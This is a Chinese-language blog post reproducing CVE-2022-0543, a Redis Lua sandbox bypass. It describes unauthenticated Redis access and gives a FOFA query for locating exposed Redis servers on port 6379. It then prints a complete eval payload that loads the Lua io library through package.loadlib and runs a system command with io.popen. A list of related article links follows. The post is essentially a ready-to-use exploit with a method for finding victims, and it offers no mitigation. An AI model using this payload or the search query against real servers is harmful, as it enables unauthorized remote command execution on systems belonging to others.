Redis Lua沙盒绕过 命令执行(CVE-2022-0543)漏洞复现

梧六柒2023-12-01 23:59

Redis Lua沙盒绕过 命令执行(CVE-2022-0543)漏洞复现

Redis如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。--那么这也就是redis未授权访问了

Redis的默认端口是6379 可以用空间测绘搜索,也可以用nmap等端口扫描工具来扫描

fofa语法搜索:port="6379" && protocol="redis"

用Another Redis Desktop Manager连接上数据库之后,在控制台输入以下命令

bash 复制代码 
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

​​​​

相关推荐
Amd7948 天前
数据库安全实战:访问控制与行级权限管理
权限管理·访问控制·数据库安全·数据脱敏·角色管理·gdpr合规·行级安全
Amd79412 天前
存储过程与触发器:提高数据库性能与安全性的利器
性能优化·存储过程·触发器·sql注入·数据库安全·数据完整性·参数化查询
Amd79423 天前
数据库安全管理中的用户和角色管理:打造安全高效的数据环境
用户管理·身份认证·数据库安全·权限控制·角色管理·数据库管理系统·安全最佳实践
Amd7941 个月前
数据库物理备份:保障数据完整性和业务连续性的关键策略
postgresql·数据恢复·数据库安全·备份策略·数据完整性·dba最佳实践·物理备份
Amd7942 个月前
数据库安全性与权限管理
权限管理·访问控制·数据加密·数据库安全·用户认证·数据完整性·安全威胁
西风未眠1 年前
MongoDB的分片集群(二) :mongodb4.x分片集群离线搭建&开启安全认证
数据库·mongodb·数据库集群·数据库安全·分片集群
_长银1 年前
SQL安全:常见手段
数据库·sql·数据库安全
Scalzdp1 年前
SQL注入漏洞发现和利用,以及SQL注入的防护
数据库·信息安全·数据库安全·sql注入漏洞利用及防护
Naive`1 年前
Sql注入详解(原理篇)
数据库·sql·mysql·web安全·数据库安全
热门推荐
01DeepSeek各版本说明与优缺点分析02如何在WPS和Word/Excel中直接使用DeepSeek功能03DeepSeek本地部署详细指南04太炸裂了!清华大学deepseek从入门到精通使用手册又出第三版了,《普通人如何抓住DeepSeek红利》(无套路,直接下载)05本地部署DeepSeek教程(Mac版本)06DeepSeek r1本地安装全指南07本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程08DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具09在Windows下安装Ollama并体验DeepSeek r1大模型10DeepSeek RAGFlow构建本地知识库系统